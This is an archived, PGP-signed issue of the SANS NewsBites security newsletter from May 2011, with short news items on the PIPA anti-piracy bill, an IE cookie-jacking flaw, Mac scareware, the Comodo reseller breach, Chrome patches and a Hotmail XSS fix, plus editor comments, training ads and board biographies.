[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Netsec] SANS NewsBites Vol. 13 Num. 42 : Wyden blocks anti-piracy bill



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Just 5 days until the early registration deadline for SANSFIRE 2011
(Washington, DC) saving you $400.  27 full-week immersion courses and a
dozen new short courses. Plus the free SANS @NIGHT presentations at
SANSFIRE are better than regular presentations at most other conferences
because they provide "what we have just learned" updates from the
incident handlers at the Internet Storm Center.
Info at: http://www.sans.org/sansfire-2011

                                       Alan

**************************************************************************
SANS NewsBites                  May 27, 2011             Vol. 13, Num. 042
**************************************************************************
TOP OF THE NEWS    
  Wyden Blocks Anti-Piracy Bill
  White House Cyber Security Proposal Met With Criticism From Legislators
  Senator Wants Google and Apple to Require Privacy Policies on Location-Aware Apps
THE REST OF THE WEEK'S NEWS 
    Cookie-jacking Flaw Found in IE
    Mac Scareware Variant Installs Without Password; Apple Acknowledges Problem
    Another Comodo SSL Certificate Reseller Attacked
    Google Updates Chrome to Version 11.0.696.71
    Hit Spammers at Their Payment Processors
    A New Twist on Pen Testing
    Microsoft Fixes Hotmail Cross-Site Scripting Flaw
***************************************************************************

TRAINING UPDATE
- -- SANS Rocky Mountain 2011, Denver, CO, June 25-30, 2011
8 courses.  Bonus evening presentations include SANS Hacklab and Why
End Users are Your Weakest Link
http://www.sans.org/rocky-mountain-2011/
- -- SANSFIRE 2011, Washington, DC, July 15-24, 2011
41 courses.  Bonus evening presentations include Ninja Developers:
Penetration Testing and Your SDLC; and Are Your Tools Ready for IPv6?
http://www.sans.org/sansfire-2011/
- -- SANS Boston 2011, Boston, MA, August 8-15, 2011
12 courses.  Bonus evening presentations include Cost Effectively
Implementing PCI through the Critical Controls; and More Practical
Insights on the 20 Critical Controls
http://www.sans.org/boston-2011/
- -- SANS Virginia Beach 2011, August 22- September 2, 2011
11 courses.   Bonus evening presentations include SANS Hacklab;
Offensive Countermeasures; and Evolving VoIP Threats
http://www.sans.org/virginia-beach-2011/
- -- SANS Ottawa 2011, Ottawa, Ontario, August 28- September 2, 2011
5 courses.   Bonus evening presentations include DNS Sinkhole: Peer
Into Your Network While You Sleep; and I See What You Did There:
Forensic Time Line Analysis
http://www.sans.org/ottawa-2011/
- -- SANS Network Security 2011, Las Vegas, NV, September 17-26, 2011
43 courses.   Bonus evening presentations include Securing the Kids;
Who is Watching the Watchers?; and Emerging Trends in the Law of
information Security and Investigations
http://www.sans.org/network-security-2011/
- -- Looking for training in your own community?
http://sans.org/community/ Save on On-Demand training (30 full
courses) - See samples at
http://www.sans.org/ondemand/discounts.php#current
Plus London, Austin, and Canberra all in the next 90 days.
For a list of all upcoming events, on-line and live: www.sans.org

************************* SPONSORED BY Symantec ***************************

Modern malware rarely strikes the same way twice. Today's malicious code
rapidly mutates, bypassing traditional defenses.  Traditional antivirus
approaches no longer work. Download the Symantec Endpoint Protection 12
beta to see how Symantec can help mitigate threats today and tomorrow
for both small businesses and the largest enterprises.

http://www.sans.org/info/78984

****************************************************************************

TOP OF THE NEWS
 --Wyden Blocks Anti-Piracy Bill
(May 26, 2011)
US Senator Ron Wyden (D-Oregon) has put a hold on a bill unanimously
approved by the Senate Judiciary Committee that would expand the
government's power to block and shut down web sites "dedicated to
infringing activities." The Protect IP Act (PIPA) would give the
government the authority to bring lawsuits against the sites and get
court orders that would require search engines to cease providing
links to the sites. In a statement, Wyden said, "By ceding control of
the Internet to corporations through a private right of action, and to
government agencies that do not sufficiently understand and value the
Internet, PIPA represents a threat to our economic future and to our
international objectives." Wyden put a hold on similar legislation
last year.
http://www.wired.com/threatlevel/2011/05/blacklisting-law-advances/
http://news.cnet.com/8301-31001_3-20066456-261.html
[Editor's Comment (Northcutt): According to Senate.gov, a "hold" is an
informal practice by which a Senator informs his or her floor leader
that he or she does not wish a particular bill or other measure to reach
the floor for consideration. The Majority Leader need not follow the
Senator's wishes, but is on notice that the opposing Senator may
filibuster (procedural methods to delay legislation) any motion to
proceed to consider the measure.  I think Sen. Wyden may be on the right
path here. The Internet, last I checked, is not a USA-only system. What
we could end up achieving is taking down a few web sites, but causing
search engines based in other countries to be the market search leaders.
http://www.senate.gov/reference/glossary_term/hold.htm
http://www.senate.gov/reference/glossary_term/filibuster.htm ]

 --White House Cyber Security Proposal Met With Criticism From Legislators
(May 23, 24 & 25, 2011)
Critics of a White House cyber security legislation proposal say that
it would allow government broader access to private information. The
proposal calls for private organizations to share cyber attack data with
DHS. It would take precedence over other laws' limits on government
access to private information. Companies sharing cyber attack
information with the government would be immune from prosecution,
harking back to the controversial immunity granted to telecommunications
companies participating in the government's warrantless wiretapping
following the September 11 attacks.
http://www.nextgov.com/nextgov/ng_20110525_7378.php?oref=topnews
http://www.computerworld.com/s/article/9217060/Lawmakers_question_Obama_cybersecurity_proposal?taxonomyId=17&pageNumber=1

 --Senator Wants Google and Apple to Require Privacy Policies on
    Location-Aware Apps
(May 25, 2011)
In a letter to Apple and Google executives, Senator Al Franken (D-Minn.)
has asked that the companies require privacy policies for
"location-aware" apps sold for their products. Franken would like to see
apps that track location data have straightforward privacy policies that
clarify exactly what information is collected, how the data are
collected and with what parties they are shared.
http://www.washingtonpost.com/blogs/post-tech/post/al-franken-asks-apple-google-to-require-app-privacy-policies/2011/05/25/AGd7aQBH_blog.html
http://www.computerworld.com/s/article/9217066/Senator_wants_privacy_policies_for_mobile_apps?taxonomyId=144

*******************************  SPONSORED LINKS  **************************
1) Hear industry experts discuss techniques to fight crimes at the
Forensics and Incident Response Summit in Austin, Texas June 7-8th. Make
sure to also attend any of the 4 post-Summit courses June 9-14th.
http://www.sans.org/info/78989

2) Learn how to secure your network during the IPv6 transition at the
Security Impact of IPv6 Summit July 15th in Washington DC and take
advantage of the post-Summit IPv6 Essentials course July 16th.
http://www.sans.org/info/78994
****************************************************************************

THE REST OF THE WEEK'S NEWS
 --Cookie-jacking Flaw Found in IE
(May 25 & 26, 2011)
An unpatched flaw in Microsoft Internet Explorer (IE) could allow
attackers to steal cookies from vulnerable computers and use them to
access password-protected websites. The vulnerability affects all
current versions of the browser running on Windows. The exploit requires
social engineering - manipulating the user into dragging and dropping
an object. A Microsoft spokesperson said the company does not consider
the flaw to be high risk because of the level of user interaction
required.
http://news.cnet.com/8301-1009_3-20066419-83.html?tag=mncol;title
http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/

 --Mac Scareware Variant Installs Without Password; Apple Acknowledges Problem
(May 24, 25 & 26, 2011)
A new variant of scareware that targets Mac users, called MacGuard, has
been detected, and this version does not require users to submit
administrator passwords to install. Earlier versions of Mac scareware,
which have gone by such names as Mac Defender, Mac Security and Mac
Protector, all required administrator passwords. Users are at risk if
they have set their Safari browsers to automatically open files
designated as safe.  Apple has acknowledged the scareware issue and says
it will release an update to detect and remove the malware. The company
has already published an advisory with recommendations for removing the
malware or avoiding infection.
The advisory from Apple is available at http://support.apple.com/kb/ht4650
http://www.h-online.com/security/news/item/Mac-Defender-variant-doesn-t-require-admin-password-1250910.html
http://www.informationweek.com/news/security/vulnerabilities/229625602
http://www.theregister.co.uk/2011/05/25/apple_acknowledges_macdefender/
http://www.bbc.co.uk/news/technology-13560137
http://www.computerworld.com/s/article/9217061/Newest_MacDefender_scareware_installs_without_a_password?taxonomyId=17
http://www.computerworld.com/s/article/9217034/Apple_admits_Mac_scareware_infections_promises_cleaning_tool?taxonomyId=17
http://www.v3.co.uk/v3-uk/news/2074168/mac-defender-scareware-variant-macguard-installs-admin-password

 --Another Comodo SSL Certificate Reseller Attacked
(May 24 & 25, 2011)
Another Comodo SSL certificate reseller has suffered an attack.
ComodoBR, the company's Brazilian partner, had portions of its database
accessed through an SQL injection attack. The compromised data include
customer information, submitted certificate requests and ComodoBR
employee access credentials. Earlier this year, another Comodo partner
was attacked and the attackers issued themselves certificates signed
with Comodo's root key. No certificates were issued in the attack on the
Brazilian reseller.
http://www.h-online.com/security/news/item/Another-Comodo-SSL-registrar-hacked-1250283.html
http://www.theregister.co.uk/2011/05/24/comodo_reseller_hacked/
http://www.eweek.com/c/a/Security/SQL-Injection-Attack-Expooses-Comodo-Partner-Customer-Data-530220/
[Editor's Comment (Northcutt): Certificate granting authorities are
among the highest margin business opportunities. You give me three
thousand dollars, I give you a string of bits. You would think they
would take security more seriously than anyone, because they have so
much to lose. On the organizational side of the house, these things
force one to rethink security architecture. Stuxnet code was signed with
a stolen certificate; more recently W32.Qakbot was signed with a
legitimate key:
http://www.symantec.com/connect/blogs/w32qakbot-under-surface ]

 --Google Updates Chrome to Version 11.0.696.71
(May 25 & 26, 2011)
Google has issued a Chrome update to address four vulnerabilities, two
of which are rated critical. The critical flaws fixed in Chrome version
11.0.696.71 are a memory corruption bug in the GPU command buffer and
an out-of-bounds write issue in blob handling. The other two flaws, with
severity ratings of high and low respectively, are a stale pointer
vulnerability and a flaw that could allow bypassing the popup blocker.
Google will not release details of the issues until more users have been
updated.
http://gcn.com/articles/2011/05/25/ecg-google-releases-security-update-for-chrome.aspx?admgarea=TC_SECCYBERSSEC
http://www.h-online.com/security/news/item/Chrome-11-update-patches-critical-holes-1250075.html
http://www.computerworld.com/s/article/9217050/Google_patches_critical_Chrome_bugs

 --Hit Spammers at Their Payment Processors
(May 25, 2011)
Nearly all financial transactions arising from spam operations are
handled by just three banks, according to a paper from 15 researchers
from the University of California at Berkeley, the University of
California at San Diego, the International Computer Science Institute
and the Budapest University of Technology and Economics. The paper,
which "follows the money" from spam around the world, is scheduled to
be delivered next week at the IEEE Symposium on Security and Privacy
2011. The researchers gathered real spam data and made more than 100
purchases from the sites the messages led to. The three banks are
Azerigazbank in Azerbaijan, DnB NOR in Latvia, and St.
Kitts-Nevis-Anguilla National Bank in the Caribbean. As potential
solutions, the researchers recommend that issuing banks in the US refuse
to conduct "card not present" transactions for known spammers.
http://www.informationweek.com/news/security/client/229625599
http://www.networkworld.com/news/2011/052511-want-to-stop-junk-email.html
[Editor's Note (Schultz): This is one of the most interesting
information security research efforts in recent years.
(Honan): This is a very interesting development in the fight against
spam.  While changing hosting providers is a trivial matter for spam
operators changing their payment processor is not easy making it more
time consuming and costly for spammers to conduct their operations.
Should enough of these payment processors be identified and blacklisted
it could have a major impact in the amount of spam flooding our
networks.]

 --A New Twist on Pen Testing
(May 25, 2011)
A computer network designed for a new Colorado Department of Corrections
maximum security facility received some penetration testing from the
prisoners themselves. The system is for a facility where prisoners are
isolated for 23 hours a day. Cells are equipped with thin client kiosks:
a monitor screen behind a clear plate, a headset, a mouse, and a
keyboard with limited functionality.  Prisoners watch television, and
receive calls and virtual visits through the system. "The network is
isolated from the Internet, and services hosted outside are delivered
through reverse proxy servers." A new image of the OS is loaded every
time the system boots. Because the prisoners are alone in their cells
for the majority of the day, they spent a lot of time trying to
circumvent the system. They discovered that opening more than 200
windows in IE caused a buffer overflow that overrode group policy and
allowed access to more functions through their keyboards.  They also
figured out how to access visitation systems and communicated with one
another. The issues revealed by their efforts have been addressed.
http://gcn.com/Articles/2011/05/30/Colorado-Prison-Sidebar.aspx?s=gcndaily_260511&p=1
http://gcn.com/Articles/2011/05/30/Colorado-Prison-Internet.aspx?p=1

 --Microsoft Fixes Hotmail Cross-Site Scripting Flaw
(May 24, 2011)
Microsoft has fixed a security issue in Hotmail that was being actively
exploited to steal users' messages and contact lists.  Attackers sent
targets email messages containing malicious scripts.  Computers become
infected when recipients open or preview the message.  The embedded code
uploaded messages and contact lists to remote servers. The attack was
possible due to a cross-site scripting flaw which has been remedied.
http://www.theregister.co.uk/2011/05/24/microsoft_hotmail_email_theft_attack/
http://www.computerworld.com/s/article/9217032/Hackers_steal_Hotmail_messages_thanks_to_Web_flaw?taxonomyId=17
http://www.v3.co.uk/v3-uk/news/2073409/microsoft-patches-information-stealing-hotmail-bug

************************************************************************
The Editorial Board of SANS NewsBites

Eugene Schultz, Ph.D., CISM, CISSP, GLSC is CTO of Emagined Security and
the author/co-author of books on Unix security, Internet security,
Windows NT/2000 security, incident response, and intrusion detection and
prevention. He was also the co-founder and original project manager of
the Department of Energy's Computer Incident Advisory Capability (CIAC).

John Pescatore is Vice President at Gartner Inc.; he has worked in
computer and network security since 1978.

Stephen Northcutt founded the GIAC certification and currently serves
as President of the SANS Technology Institute, a post graduate level IT
Security College, www.sans.edu.

Dr. Johannes Ullrich is Chief Technology Officer of the Internet Storm
Center and Dean of the Faculty of the graduate school at the SANS
Technology Institute.

Ed Skoudis is co-founder of Inguardians, a security research and
consulting firm, and author and lead instructor of the SANS Hacker
Exploits and Incident Handling course.

Rob Lee is the curriculum lead instructor for the SANS Institute's
computer forensic courses (computer-forensics.sans.org) and a Director
at the incident response company Mandiant.

Rohit Dhamankar is a security professional currently involved in
independent security research.

Tom Liston is a Senior Security Consultant and Malware Analyst for
Inguardians, a handler for the SANS Institute's Internet Storm Center,
and co-author of the book Counter Hack Reloaded.

Dr. Eric Cole is an instructor, author and fellow with The SANS
Institute. He has written five books, including Insider Threat and he
is a founder with Secure Anchor Consulting.

Ron Dick directed the National Infrastructure Protection Center (NIPC)
at the FBI and served as President of the InfraGard National
Members Alliance - with more than 22,000 members.

Mason Brown is one of a very small number of people in the information
security field who have held a top management position in a Fortune 50
company (Alcoa).  He is leading SANS' global initiative to improve
application security.

David Hoelzer is the director of research & principal examiner for
Enclave Forensics and a senior fellow with the SANS Technology
Institute.

Mark Weatherford, Chief Security Officer, North American Electric
Reliability Corporation (NERC).

Alan Paller is director of research at the SANS Institute.

Marcus J. Ranum built the first firewall for the White House and is
widely recognized as a security products designer and industry
innovator.

Clint Kreitner is the founding President and CEO of The Center for
Internet Security.

Brian Honan is an independent security consultant based in Dublin, Ireland.

David Turley is SANS infrastructure manager and serves as production
manager and final editor on SANS NewsBites.

Please feel free to share this with interested parties via email, but
no posting is allowed on web sites. For a free subscription, (and for
free posters) or to update a current subscription, visit
http://portal.sans.org/


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (Darwin)
Comment: GPGTools - http://gpgtools.org

iEYEARECAAYFAk3fzH8ACgkQ+LUG5KFpTkamXwCgh5LehvfX/pV5uuvhHdZPkPUg
NqsAn0UEeKvJfZAEHPlgRvScIR7qiG7U
=A2Vd
-----END PGP SIGNATURE-----